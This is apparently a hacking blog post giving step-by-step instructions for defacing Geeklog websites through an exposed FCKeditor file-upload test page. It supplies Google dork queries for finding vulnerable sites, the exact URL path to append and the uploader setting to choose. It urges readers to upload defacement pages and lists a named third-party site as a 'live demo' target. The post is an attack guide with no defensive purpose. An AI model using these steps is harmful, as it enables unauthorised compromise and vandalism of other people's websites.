Geeklog Remote Deface Upload Vunerablity
This Vunerablity is Similar to WordPress fckeditor upload Vulnerabilities ( AS POSTED BEFORE Many Such Hacking with Vulnerability ) in Geeklog just the Path Changed,
Lets Start
open google.com & enter This
Google dork:
index of/ geeklog/fckeditor/editor/filemanager/upload/test.html
or
inurl:"/geeklog/"
Now go to site site.com/geeklog/
Now Put The Url /Geeklog/fckeditor/editor/filemanager/upload/test.htmlafter .com .net or
site domain
now the url will be
site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html
Now select php in
Select the "File Uploader" to use:
Now Upload Your deface :)
Live Demo:
http://www.shainystar.com/geeklog/fckeditor/editor/filemanager/upload/
http://www.shainystar.com/geeklog/fckeditor/editor/filemanager/upload/test.html
Now deface your own page have fun
Post a Comment
Post a Comment
Feel Free To Ask Your Query we Love To Answer